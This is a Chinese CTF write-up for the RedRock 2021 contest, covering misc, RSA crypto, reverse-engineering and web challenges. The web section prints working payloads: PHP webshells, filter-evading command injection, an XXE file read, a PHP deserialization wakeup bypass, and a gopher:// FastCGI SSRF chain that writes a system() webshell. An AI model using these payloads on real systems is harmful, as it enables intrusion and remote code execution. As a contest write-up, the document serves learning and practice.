redrock-wp-2021
redrockcrf wp
MSIC
一眼看不出flag:
题目:-…/.-/.-/-…/.-/.-/-…/-…/-…/.-/.-/.-/-…/.-/.-/.-/.-/.-/.-/.-/-…/.-/.-/-…/.-/-…/-…/.-/.-/.-
摩斯密码,在线解密,得到BAABAABBBAAABAAAAAAABAABABBAAA,是培根密码,解密结果是soeasy,提交redrock{soeasy};
ELMA:
题目:
根据hint,进入对应网站http://www.atoolbox.net/Tool.php?Id=699
上传图片解密,得到链接https://rin777-1306176007.cos.ap-nanjing.myqcloud.com/lsb.jpg
进去是一个残缺的二维码
修补角上的方块,微信扫码可得到flag,redrock{Welc_0meToR3dRo_ckCup}
yyz的流量:
打开往下浏览发现隐隐约约有一些text的包,直接使用wireshark的导出功能,把HTTP的全部导出保存,发现导出的文件中名为_的里面是一个上传界面的html代码,继续往下看,发现了名为1(1).php的文件,打开是一个php马,有eval和str_rot13函数,继续往下翻,在1(36).php文件中发现了一个不寻常的字符串
1 | =dee48942104eerqebpx{pr7r1951s077qs97rq166r5838p33r42} |
前面知道,使用过rot13函数,就是字母回转13位,r的rot13恰好是e,e的rot13恰好是r,提交格式是redrock{},拿去rot13处理得到flag:redrock{ce7e1951f077df97ed166e5838c33e42}。
CRYPTO
base全家桶:
1 | 3441353234333536353535323433343434423539354135353435353233323442344134323435343535333536343235333443343234383535343535363442343634373441343735343435353533323530343934413437343634463444353235353439344534323535353535363533344334423532343235343439353333323534344134453441343534353532353335363442354134413535344435343332343334433441343434353533344433323535344234363438343434423535344235353439343634383535353735363533344334423441343635353442353234423535343734453434343533343536353333323443343234423536344435313533353234413445343634363531353633323434344135363432343634443532333233323441353234343436343334453433343434423436343635363533353734423537344134443333343535373536344234463442344134413535344234453433353534413445343434353446353635323533344235353541343634353531353335323441343234423534333235303441333534383535333635343332334433443344 |
两次base16解密,两次base32解密,两次base64解密,base在线工具https://ctf.bugku.com/tools
redrock{bf05214a2d78d93479788d7539e65c46}
福尔摩斯卷卷:
1 | kb51c4017d556b1fb96d271d56e4c0c93l |
给了一个特殊的字符串和一个数字2,使用栅栏2解密,得到k9b65d12c7410d1576de545c60bc19f3bl,md5在线解密,得到thecat,flag:redorock{thecat}。
rsa1.txt:
1 | p=147612109163370473726853940149285791098788760038966902274068135592961283314637173338522787501221233131551934112621199764391055903055665279340723435443214438803958052928508552115094413883509444599367111269535437533008007741722534136778697906522597440831904650183582467394987289371711734685640404907683000858869 |
知道质数p,q,公钥e,密文c,网上找一个python解密rsa的脚本,修改一下数据
原文链接:https://blog.csdn.net/qq_40657585/article/details/84874073
1 | #!/usr/bin/python |
运行得出结果flag{rsa_is_so_eeeeeeasy}
rsa2.txt:
1 | n=27165699915478709899591037909826730786499370104451475178959677543485932094152566857665100521244621688426173292606958647441926888982292857459950857121109158161417783978032371470391030158208122646010467257809663979992182107935125521808536962013120865546513540563130603293071529020712172040077444698746824359887941345818662045893966193039118981343228426520585886421937556928721831233403243298340607111229786172645138352024466710627334325187128901680598546484484520891371243651986807815831171755575193464079906876262015978739931088486581874643062651911618853280170017666942391286592194127295774862811346780551960902842223 |
1 | import gmpy2 |
给出n,e,c,使用yafu分解数n,求得P309 = 164820204815667881451830216997273520673704160510528999288311267052928164929154110870792893999538507439807665465929918937860909796806255428508049083149603281706883650885793534757491123121348204344560340210813782875319255176850113664114440116798695137487762411727155531291658550163709763022464037056557871355317
P309 = 164820204815667881451830216997273520673704160510528999288311267052928164929154110870792893999538507439807665465929918937860909796806255428508049083149603281706883650885793534757491123121348204344560340210813782875319255176850113664114440116798695137487762411727155531291658550163709763022464037056557871353619
根据rsa1的脚本,修改数值。
1 | #!/usr/bin/python |
得到结果flag{yafuuuuuuuuuuu!!}
rsa3.txt:
1 | n=12193165491232590150686982432557244804300750963175008178236581194544171828897340736916176149173721551510190319108772113575377325860653421908067617797675141336620007755973554040917786258089348023269695843501039718996399429207128831592342485274073559355787675660026139594401556004887413636861987542041178448038883087652407784191872220121749480825916533097977902472760860392352675957455292246566059496154702620024668875067749860935756039381451038144741567698966832403739607807494155714430462171863146787192405435943867107310410641010836155850842469201306161627801130957327434956927373515462512612188696131269636192461423 |
题目给出n,e,c,n很大无法求解,但是e=3,根据网上的脚本修改一下,原文链接https://blog.csdn.net/m0_46230316/article/details/105904020,(使用kali的python3,否则会遇到第三方库问题)
1 | #!/usr/bin/env python |
输出为0x666c61677b333333333333333333333333333333337d,网上十六进制转字符串得到flag{3333333333333333}。
rsa4.txt:
1 | n=21986952806083130275797030452868092210388137103595814788381248228107929558485767818149518117932024450374044287378157581547697424876342510478383269724874135655601388068311221551534992774719985788098089299398773525516314130692671612649055459290980711341053921160651223628975025276916068562487276949413795212067701663409252958915147001221841172575522092200851913186869160247427103350875050014227644172312145910978929739518600818119553066877138825546574926506980419695756570336121367807763597790159805982689429185389067077219495106100710784490003787384470363349515390928245929021470777491993247675208476744147539290542079 |
题目给出一个n,两个c,两个e,可以用共模攻击,原文链接:https://www.cnblogs.com/P201521440001/p/11439344.html,将数据补上运行即可。
1 | from libnum import n2s,s2n |
得到0x666c61677b436f6d6d6f6e5f4d6f64756c75735f41747461636b7d,在线十六进制转字符串,最后结果flag{Common_Modulus_Attack}
RE
easy_py:
题目地址:https://www.lanzouw.com/iNYNTwvaa5i
密码:2ktr
拿到手是python图标封装的exe文件,使用pyinstxtractor解包,在exe_extracted里面没有找到main文件,PYZ-00.pyz_extracted为空,主目录下有python.pyc和struct.pyc,使用uncompyle还原pyc文件
1 | PS D:\文档> uncompyle6 .\struct.pyc |
不支持python3.9平台反编译,使用xxd查看python.pyc文件二进制数据,有很类似flag的字符串
1 | 000002f0: 094e e905 0000 007a 0566 6c61 677b e9ff .N.....z.flag{.. |
直接运行easy_py.exe,输入猜测的flag{P9tH0n_1_l0v@_90u_50_muChz},显示good但是不完美,根据flag内容猜测语义python i love you so much,去掉z,flag{P9tH0n_1_l0v@_90u_50_muCh}成功。
cythonic:
1 | 3 0 LOAD_GLOBAL 0 (input) |
根据题目提示,要用到python的dis库,就是根据dis.dis()的输出来还原python的源代码,最右侧是源代码含有的一部分数据,第一列是行数,第三列类似助记符,虽然没有完全成功还原源代码(cythonic中有GET_IETR和FOR_IETR助记符,但是却没有SETUP_LOOP助记符,不知道本来就是这样还是缺失了,我这补了一个for循环多了一个SETUP_LOOP),但是能够大概的还原源代码的样子。
1 | import dis |
还原源代码后,根据加密那一块的加密方式写出解密的方法
1 | import disdef hello(): #usr_flag=input('EasyEasyEasy!') #if (len(usr_flag)!=48): # exit(77777) usr_flag=[str((i%10)) for i in range(48)] usr_flag=''.join(usr_flag) print(usr_flag) ints=[187,187,174,145,207,175,194,133,181,160,201,180,181,225,168,195,217,166,135,163,219,143,134,\ 180,190,255,155,156,243,252,158,233,130,153,235,230,187,204,239,205,176,147,144,248,187,186,254,252] digits=list(map(ord,list('https://space.bilibili.com/672328094'))) key=[] key.append('y') key.append('b') key.append('b') Hai=[] for i,j in enumerate(usr_flag): #Hai.append((ord(j)+ord(key[i%3]))^(digits[ i%36])) Hai.append((ints[i]^digits[i%36])-ord(key[i%3])) if Hai==ints: print('WelCome') for a in Hai: print(chr(a),end='')#dis.dis(hello)hello() |
得出来是一个加密后的编码ZmxhZ3tHdWFuWmh1SmlhUmFuX0R1bl4yX0ppZV9DaGFufQ==,base64解密得到flag:flag{GuanZhuJiaRan_Dun^2_Jie_Chan}。
WEB
我要黑了红岩网校:
打开御剑,目录扫描,有个robots.txt,访问就是flag。
卷卷的backdoor:
go语言源码
1 | package main |
下载附件,分析源码,发现有GET和PUT两种方法,get访问显示正常,put访问/hacked-by-yyz-from-sre应该就会调用backdoor然后显示flag,打开burpsuite,抓包,发送到repeater,修改包数据,访问即可。
1 | PUT /hacked-by-yyz-from-sre HTTP/1.1Host: 928cc5cc-f8d3-4e90-87d3-b7cc9e2406db.ctf.redrock.teamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: -----------------------------------(使用自己的cookie)Upgrade-Insecure-Requests: 1Cache-Control: max-age=0 |
最后出现redrock{3abcfa3d-a5c5-4790-9264-a4c897189be3}。
ez_exec:
首先用万能密码绕过,登录进去,账户admin,密码”or”=”a’=’a,发现是个命令执行,发现可以用ls,但是过滤了空格,cat,nl,more等命令,空格最后发现可以用%09绕过,less没有过滤可以用less查看文件。
1 | payload=/ping.php?ip=127.0.0.1;less%09ping.php; |
发现ping.php源码,过滤了flag字符串,进入根目录发现flag,
1 | /ping.php?ip=127.0.0.1;cd%09../../../../../;ls; |
但是flag被过滤,可以使用反引号,输出的内容作为输入绕过。
1 | payload=/ping.php?ip=127.0.0.1;cd%09../../../../../;ls;less%09`ls`; |
最后出现flag:redrock{45a27061-e33f-43e4-a750-b96309c9172c}。
easynodejs:
查看页面源代码,最后一行,下载文件查看源代码
有关键代码
1 | if (username !== 'admin' && username == 'admin' && password == "admin") { message = 'login success!! flag is ' + flag; } |
nodejs的弱类型。打开burp,修改数据包,发送
1 | username[0]=admin&password=admin |
最后得到flag:redrock{b5ed9cab-ed27-4f1a-bfb5-4ad53802d755}。
myshopxo:
使用目录扫描,有个robots.txt,发现有个www.zip,直接访问下载源码,使用php代码审计工具rips,发现/application/index/view/lengyu/index/star.php,内容是
1 | ec ho md5(1);@eval($_POST[1]); |
使用蚁剑连接,登录成功,发现可以在当前目录下创建文件,但是使用系统命令失败,新建一个php马。
1 | @assert($_REQUEST["password"]); |
GET执行查看到phpinfo()的信息,根据提示绕过df,网上找了一个php探针的脚本,发现禁用一大堆函数。
php 探针
1 | <?phpheader("content-Type: text/html; charset=utf-8");header("Cache-Control: no-cache, must-revalidate");header("Pragma: no-cache");error_reporting(0);ob_end_flush();?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Pragma" content="No-cache" /><meta http-equiv="Expires" content="0" /><meta http-equiv="cache-control" content="private" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" />//加了这句,看看能不能解决linux下显示乱码的问题?<title>PHP 探针 v1.0</title><style type="text/css"><!--body{text-align:center;margin-top:20px;background-color:#a9b674;}#overview{width:700px;margin:0 auto;text-align:left;}a{text-decoration:underline;color:#992700;}.strong{color:#992700;}.basew{width:300px;}--></style></head><body><div id="overview"><div id="copyright">版权信息<a href="hello.php?typ=baseinfo">[基本信息]</a> <a href="hello.php?typ=superinfo">[高级信息]</a><?phpif (function_exists("phpinfo")){ echo'<a href="hello.php?typ=phpinfo">[phpinfo]</a>';}echo'<br />php探针v1.0 by MKDuse(blueidea-id)<br /><br />此程序代码,可免费使用;但不得用于商业用途;完全转载或使用此代码,请保留版权信息;<br />欢迎指正错误提建议,QQ:122712355</div>';if (empty($_GET['typ'])){ baseinfo();}else{switch ($_GET['typ']){case 'phpinfo':phpinfoview();break;case 'superinfo':superinfo();break;case 'baseinfo':baseinfo();break;default:baseinfo();}}function getime(){ $t = gettimeofday(); return (float)($t['sec'] + $t['usec']/1000000);}function baseinfo(){echo '<h1>基本信息</h1>';$arr[]=array("Current PHP version:",phpversion());$arr[]=array("Zend engine version:",zend_version());$arr[]=array("服务器版本",$_SERVER['SERVER_SOFTWARE']);$arr[]=array("ip地址",$_SERVER['REMOTE_HOST']);//ip$arr[]=array("域名",$_SERVER['HTTP_HOST']);$arr[]=array("协议端口",$_SERVER['SERVER_PROTOCOL'].' '.$_SERVER['SERVER_PORT']);$arr[]=array("站点根目录",$_SERVER['PATH_TRANSLATED']);$arr[]=array("服务器时间",date('Y年m月d日,H:i:s,D'));$arr[]=array("当前用户",get_current_user());$arr[]=array("操作系统",php_uname('s').php_uname('r').php_uname('v'));$arr[]=array("include_path",ini_get('include_path'));$arr[]=array("Server API",php_sapi_name());$arr[]=array("error_reporting level",ini_get("display_errors"));$arr[]=array("POST提交限制",ini_get('post_max_size'));$arr[]=array("upload_max_filesize",ini_get('upload_max_filesize'));$arr[]=array("脚本超时时间",ini_get('max_execution_time').'秒');if (ini_get("safe_mode")==0){$arr[]=array("PHP安全模式(Safe_mode)",'off');}else{$arr[]=array("PHP安全模式(Safe_mode)",'on');}if (function_exists('memory_get_usage')){$arr[]=array("memory_get_usage",ini_get('memory_get_usage'));}//$arr[]=array("可用空间",intval(diskfreespace('/')/(1024 * 1024))."M");echo'<table>';for($i=0;$i<count($arr);$i++){ $overview='<tr><td class="basew">'.$arr[$i][0].'</td><td>'.$arr[$i][1].'</td></tr>'; echo $overview;}echo'</table>';echo '<h2>服务器性能测试</h2>';echo'<table><tr><td>服务器</td><td>整数运算<br />50万次加法(1+1)</td><td>浮点运算<br />50万次平方根(3.14开方)</td></tr>';echo'<tr><td>MKDuse的机子(P4 1.5G 256DDR winxp sp2)</td><td>465.08ms</td><td>466.66ms</td></tr>';$time_start=getime();for($i=0;$i<=500000;$i++);{$count=1+1;}$timea=round((getime()-$time_start)*1000,2);echo '<tr class="strong"><td>当前服务器</td><td>'.$timea.'ms</td>';$time_start=getime();for($i=0;$i<=500000;$i++);{sqrt(3.14);}$timea=round((getime()-$time_start)*1000,2);echo '<td>'.$timea.'ms</td></tr></table>';?><script language="javascript" type="text/javascript">function gettime(){ var time; time=new Date(); return time.getTime();}start_time=gettime();</script><?phpecho '<h2>带宽测试</h2>';for ($i=0;$i<100;$i++){print "<!--1234567890#########0#########0#########0#########0#########0#########0#########0#########012345-->";}?><p id="dk"></p><script language="javascript" type='text/javascript'>var timea;var netspeed;timea=gettime()-start_time;netspeed=Math.round(10/timea*1000);document.getElementByIdx("dk").innerHTML="向客户端发送10KB数据,耗时"+timea+"ms<br />您与此服务器的连接速度为"+netspeed+"kb/s";</script><?phpecho'<h2>已加载的扩展库(enable)</h2><div>';$arr =get_loaded_extensions();foreach($arr as $value){ echo $value.'<br />';}echo'</div><h2>禁用的函数</h2><p>';$disfun=ini_get('disable_functions');if (empty($disfun)){ echo'没有禁用</p>';}else{echo ini_get('disable_functions').'</p>';}}//关闭function superinfo(){echo'<h1>高级信息</h1><p>PHP_INI_USER 1 配置选项可用在用户的 PHP 脚本或Windows 注册表中<br> PHP_INI_PERDIR 2 配置选项可在 php.ini, .htaccess 或 httpd.conf 中设置 <br>PHP_INI_SYSTEM 4 配置选项可在 php.ini or httpd.conf 中设置 <br>PHP_INI_ALL 7 配置选项可在各处设置</p>';$arr1=ini_get_all();for ($i=0;$i<count($arr1);$i++) {$arr2=array_slice($arr1,$i,1);print_r($arr2);echo '<br />';}}function phpinfoview(){ phpinfo();}?></div></body></html> |
1 | #禁用函数stream_socket_client,fsockopen,pfsockopen,ini_alter,posix_kill,putenv,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,iconv,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,dl,mail |
最后找到php有个glob函数可以跨目录读取目录,上传脚本,并浏览器执行
1 | $fileList=glob('/*');for ($i=0; $i<count($fileList); $i++) {echo $fileList[$i].'<br />';}$fileList2=glob('images/*');for ($i=0; $i<count($fileList2); $i++) {echo $fileList2[$i].'<br />';}$fileList3=glob('*');for ($i=0; $i<count($fileList3); $i++) {echo $fileList3[$i].'<br />';} |
读取到关键内容,有flag和readflag两个文件,接下来就是要读取文件。
1 | bin dev etc flag home lib media mnt proc readflag root run sbin srv sys tmp usr var |
根据题目题是源代码中含有数据库的相关信息,上传一个c99大马,需要请联系我,以root进数据库,查看数据库结构,有个s_admin的表,看到admin用户和passwd的加密形式,md5在线解密失败,以为是mysql提权,但是没有头绪,最后想到mysql可能能查看文件内容,找到相关信息,找到三种方法1.load_file(),2.load data infile(),3.system cat,之前使用mysql调用系统命令,但是失败了,最后通过load data infile成功读取到文件内容。
1 | $con = mysql_connect("127.0.0.1","root","root");$select_db = mysql_select_db('shopxo');if (!$select_db) { die("could not connect to the db:\n" . mysql_error());}//查询代码$sql = "load data infile '/flag' into table s_admin";$res = mysql_query($sql);if (!$res) { die("could get the res:\n" . mysql_error());}while ($row = mysql_fetch_assoc($res)) { print_r($row);}//查询代码//关闭数据库连接mysql_close($con); |
浏览器执行该php,虽然sql语句有问题,但是显示出了flag
1 | could get the res: Incorrect integer value: 'redrock{2cb81f52-257c-4187-8a5d-9d3456007631}' for column `shopxo`.`s_admin`.`id` at row 1 |
ez_serialize:
进入网站就看见源码,是经典的php反序列化。
1 | <?phphighlight_file(__FILE__);error_reporting(0);include "flag.php";class Test{ private $secret; function __construct($secret) { $this->secret=$secret; } function __wakeup() { $this->secret="error"; } function __destruct() { if ($this->secret === "admin") { global $flag; echo $flag; } else { die("secret error!"); } }}$a = $_GET[serialize];if (stristr($a, "secret")) { die("Go out!!Hacker!!");} else { unserialize($a);} |
首先接受一个serialize的参数,通过stristr函数防止参数中含有sercret字符串,然后反序列化这个变量,首先构造一个基础的payload=?serialize=O:4:”Test”:1:{s:10:”%00Test%00secret”;s:5:”admin”;}(加上%00是因为secret是私有变量,变量中的类名前后会有空白符),但是这个过不去secret,但是表示字符类型的s大写时,会被当成16进制解析,构造payload=?serialize=O:4:”Test”:1:{S:12:”\00\54\65\73\74\00\73\65\63\72\65\74”;s:5:”admin”;},但是反序列化时会优先使用__wakeup方法(如果有的话),这时就需要绕过wakeup,这是个cve漏洞,当反序列化字符串,表示属性的个数大于真实的个数,就会跳过wakeup执行。最终payload=?serialize=O:4:”Test”:5:{S:12:”\00\54\65\73\74\00\73\65\63\72\65\74”;s:5:”admin”;}(这道题属性个数大于1即可)。
start xxe:
题目告诉是xxe类型的题,打开连接,看到是一个登录界面,查看源代码,有一个注释告诉了flag的位置。
1 | <!--flag is in /flag--> |
接下来使用burp抓包,随便写一个admin用户密码,发送。
1 | //发送数据POST /doLogin.php HTTP/1.1Host: 2272c936-816d-4418-93ce-8d9184928b32.ctf.redrock.teamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0Accept: application/xml, text/xml, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/xml;charset=utf-8X-Requested-With: XMLHttpRequestContent-Length: 66Origin: http://2272c936-816d-4418-93ce-8d9184928b32.ctf.redrock.teamConnection: closeReferer: http://2272c936-816d-4418-93ce-8d9184928b32.ctf.redrock.team/Cookie: Hm_lvt_217f0d7270e06220a2ec9fbc0877488d=1636718269,1637038834,1637461650<user><username>admin</username><password>admin1</password></user>//返回数据HTTP/1.1 200 OKContent-Type: text/html; charset=utf-8Date: Sun, 21 Nov 2021 11:45:29 GMTServer: nginx/1.16.1X-Powered-By: PHP/7.4.5Connection: closeContent-Length: 62<result><code>0</code><msg>admin,xml login fail</msg></result> |
看见返回了是用户名登录失败,开始构造一个任意文件读取的xxe的payload。
1 | <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [<!ELEMENT name ANY><!ENTITY xxe SYSTEM "file:///flag">]><user><username>&xxe;</username><password>admin1</password></user> |
点击发送直接返回flag:redrock{e6c308c4-b14a-493e-b938-7347caecf6a8}。附带一个xxe的博客园:https://www.cnblogs.com/backlion/p/9302528.html
start ssrf:
ssrf可以利用file:///协议读取本地文件,post传参url=file:///flag,没有内容显示,但是传参url=file:///etc/passwd会显示passwd的内容。说明file协议是有用的,构造一个payload看能否引起报错,url=file:///%00。
1 | Warning: curl_setopt(): Curl option contains invalid characters (\0) in /var/www/html/index.php on line 5 |
出现路径,直接读取文件,payload:url=file:///var/www/html/index.php
1 | <h1>star刚学了php,他听说php自带curl的功能,于是他写了个网页</h1><p>请post url</p><h2>请求结果</h2><h2><h1>star刚学了php,他听说php自带curl的功能,于是他写了个网页</h1><p>请post url</p><?php$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $_POST['url']);curl_setopt($ch, CURLOPT_HEADER, 0);?><h2>请求结果</h2><h2><?phpecho curl_exec($ch);curl_close($ch);?></h2><script>console.log("hack by yyz!")</script>1</h2><script>console.log("hack by yyz!")</script> |
没有进行任何过滤。后面发放提示是nginx和php结构,构造payload查看nginx配置文件,url=file:////etc/nginx/nginx.conf,才发现有fastcgi,fastcgi_pass 127.0.0.1:9000,这时利用ssrf攻击本地PHP-FPM服务,达到任意代码执行的效果。直接利用gopher工具构造payload。
1 | python gopherus.py --exploit fastcgi ________ .__ / _____/ ____ ______ | |__ ___________ __ __ ______/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \ \______ /\____/| __/|___| /\___ >__| |____//____ > \/ |__| \/ \/ \/ author: $_SpyD3r_$Give one file name which should be surely present in the server (prefer .php file)if you don't know press ENTER we have default one: /var/www/html/index.php /*前面获得的php绝对路径*/Terminal command to run: echo PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsncGFzc3dvcmQnXSk7Pz4= |base64 -d > /var/www/html/shell1.php /*webshell base64写入,原马是<?php system($_REQUEST['password']);?>*/Your gopher link is ready to do SSRF:gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH147%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%93%04%00%3C%3Fphp%20system%28%27echo%20PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsncGFzc3dvcmQnXSk7Pz4%3D%20%7Cbase64%20-d%20%3E%20/var/www/html/shell1.php%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00-----------Made-by-SpyD3r----------- |
构造payload后进行一次url编码,(curl会进行一次解码),成功写入木马,接下来使用即可。payload=/shell1.php?password=ls /;发现数据:easy_ssrf_flag_bc85c363e9d6fbb576fb9a85632f5135,以为这就是flag,提交不对,重新cat一下,payload=shell1.php?password=cat /easy_ssrf_flag_bc85c363e9d6fbb576fb9a85632f5135;(用file协议查看也可以)
最后得到flag:redrock{244ddb7b-d731-43f5-aeae-05332f02874e}(环境变动,不是最开始的flag)。
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 0xchang's Blog!
wechat
alipay